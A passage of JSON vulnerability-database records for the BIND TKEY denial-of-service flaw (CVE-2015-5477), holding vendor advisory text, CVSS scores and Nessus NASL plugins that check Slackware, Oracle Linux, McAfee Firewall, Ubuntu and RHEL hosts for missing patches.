arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bind\", pkgver:\"9.10.2_P3\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.10.2_P3\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:56", "description": "From Red Hat Security Advisory 2015:1513 :\n\nUpdated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : bind (ELSA-2015-1513)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind", "p-cpe:/a:oracle:linux:bind-chroot", "p-cpe:/a:oracle:linux:bind-devel", "p-cpe:/a:oracle:linux:bind-libs", "p-cpe:/a:oracle:linux:bind-libs-lite", "p-cpe:/a:oracle:linux:bind-license", "p-cpe:/a:oracle:linux:bind-lite-devel", "p-cpe:/a:oracle:linux:bind-sdb", "p-cpe:/a:oracle:linux:bind-sdb-chroot", "p-cpe:/a:oracle:linux:bind-utils", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/85067", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1513 and \n# Oracle Linux Security Advisory ELSA-2015-1513 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85067);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1513\");\n\n script_name(english:\"Oracle Linux 6 / 7 : bind (ELSA-2015-1513)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1513 :\n\nUpdated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005223.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005246.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libs / bind-libs-lite / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:02", "description": "The remote host has a version of McAfee Firewall Enterprise installed that is affected by a denial of service vulnerability due to an assertion flaw that occurs when handling TKEY queries. A remote attacker can exploit this, via a specially crafted request, to cause a REQUIRE assertion failure and daemon exit, resulting in a denial of service condition.", "cvss3": {"score": 8.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2015-08-14T00:00:00", "type": "nessus", "title": "McAfee Firewall Enterprise DoS (SB10126)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-04-09T00:00:00", "cpe": ["x-cpe:/a:mcafee:firewall_enterprise", "cpe:/a:isc:bind"], "id": "MCAFEE_FIREWALL_ENTERPRISE_SB10126.NASL", "href": "https://www.tenable.com/plugins/nessus/85402", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85402);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/04/09 12:24:43\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_xref(name:\"IAVB\", value:\"2015-B-0099\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10126\");\n\n script_name(english:\"McAfee Firewall Enterprise DoS (SB10126)\");\n script_summary(english:\"Checks the version of MFE.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Firewall Enterprise installed\nthat is affected by a denial of service vulnerability due to an\nassertion flaw that occurs when handling TKEY queries. A remote\nattacker can exploit this, via a specially crafted request, to cause a\nREQUIRE assertion failure and daemon exit, resulting in a denial of\nservice condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10126\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch referenced in the vendor security\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:mcafee:firewall_enterprise\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_firewall_enterprise_version.nbin\");\n script_require_keys(\"Host/McAfeeFE/version\", \"Host/McAfeeFE/version_display\", \"Host/McAfeeFE/installed_patches\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"lists.inc\");\n\napp_name = \"McAfee Firewall Enterprise\";\nversion = get_kb_item_or_exit(\"Host/McAfeeFE/version\");\nversion_display = get_kb_item_or_exit(\"Host/McAfeeFE/version_display\");\ninstalled_patches = get_kb_item_or_exit(\"Host/McAfeeFE/installed_patches\");\n\npatchmap = make_array(\n \"^7\\.\" , make_list(\"70103E76\"),\n \"^8\\.3\\.[0-1](\\.|$)\" , make_list(\"8.3.1E81\"),\n \"^8\\.3\\.2(\\.|$)\" , make_list(\"8.3.2E61\")\n);\n\nfix_displays = make_array(\n \"^7\\.\" , \"70103E76\",\n \"^8\\.3\\.[0-1](\\.|$)\" , \"8.3.1 ePatch 81\",\n \"^8\\.3\\.2(\\.|$)\" , \"8.3.2 ePatch 61\"\n);\n\npatches = NULL;\nfix_display = NULL;\npatch_missing = TRUE;\n\n# Find our patch information\nforeach vergx (keys(patchmap))\n{\n if(version =~ vergx)\n {\n patches = patchmap[vergx];\n fix_display = fix_displays[vergx];\n break;\n }\n}\n\nif(isnull(patches) ||\n (\n installed_patches !~ \"(^|,)[\\d\\.]+?E\\d+?($|,)\" && collib::contains(compare:function ()\n {\n return _FCT_ANON_ARGS[1] =~ _FCT_ANON_ARGS[0];\n },\n list:patches,\n item:\"(^|,)[\\d\\.]+?E\\d+?($|,)\"\n )\n )\n )\n audit(AUDIT_INST_VER_NOT_VULN, version_display);\n\n# Check for patches that fix the issue\nforeach patch (patches)\n{\n if(patch >< installed_patches)\n {\n patch_missing = FALSE;\n break;\n }\n}\n\nif (patch_missing)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report = \n '\\n Installed Version : ' + version_display +\n '\\n Patched Version : ' + fix_display +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, fix_display, app_name);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:58", "description": "Jonathan Foote discovered that Bind incorrectly handled certain TKEY queries. A remote attacker could use this issue with a specially crafted packet to cause Bind to crash, resulting in a denial of service. (CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain configurations involving DNS64. A remote attacker could use this issue with a specially crafted query to cause Bind to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS.\n(CVE-2012-5689).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : bind9 vulnerabilities (USN-2693-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5689", "CVE-2015-5477"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bind9", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2693-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2693-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85081);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-5689\", \"CVE-2015-5477\");\n script_xref(name:\"USN\", value:\"2693-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : bind9 vulnerabilities (USN-2693-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Foote discovered that Bind incorrectly handled certain TKEY\nqueries. A remote attacker could use this issue with a specially\ncrafted packet to cause Bind to crash, resulting in a denial of\nservice. (CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain\nconfigurations involving DNS64. A remote attacker could use this issue\nwith a specially crafted query to cause Bind to crash, resulting in a\ndenial of service. This issue only affected Ubuntu 12.04 LTS.\n(CVE-2012-5689).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2693-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind9 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bind9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bind9\", pkgver:\"1:9.8.1.dfsg.P1-4ubuntu0.12\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bind9\", pkgver:\"1:9.9.5.dfsg-3ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"bind9\", pkgver:\"1:9.9.5.dfsg-9ubuntu0.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind9\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:44:41", "description": "Updated bind packages that fix three security issues are now available for Red Hat Enterprise Linux 6.6 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477, CVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan Foote as the original reporter of CVE-2015-5477, and Hanno Bock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2016-01-29T00:00:00", "type": "nessus", "title": "RHEL 6 : bind (RHSA-2016:0079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2016-0079.NASL", "href": "https://www.tenable.com/plugins/nessus/88480", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0079. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88480);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\");\n script_xref(name:\"RHSA\", value:\"2016:0079\");\n\n script_name(english:\"RHEL 6 : bind (RHSA-2016:0079)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6.6 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain\nmalformed DNSSEC keys. A remote attacker could use this flaw to send a\nspecially crafted DNS query (for example, a query requiring a response\nfrom a zone containing a deliberately malformed key) that would cause\nnamed functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use\nthis flaw to send a query to request a cached record with a malformed\nclass attribute that would cause named functioning as an authoritative\nor recursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they\nperform authentication when making recursive queries to resolve\naddresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges\nJonathan Foote as the original reporter of CVE-2015-5477, and Hanno\nBock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe update, the BIND daemon (named) will be restarted automatically.\"\n );\n # https://kb.isc.org/article/AA-01272\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n # https://kb.isc.org/article/AA-01287\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01287\"\n );\n # https://kb.isc.org/article/AA-01317\n 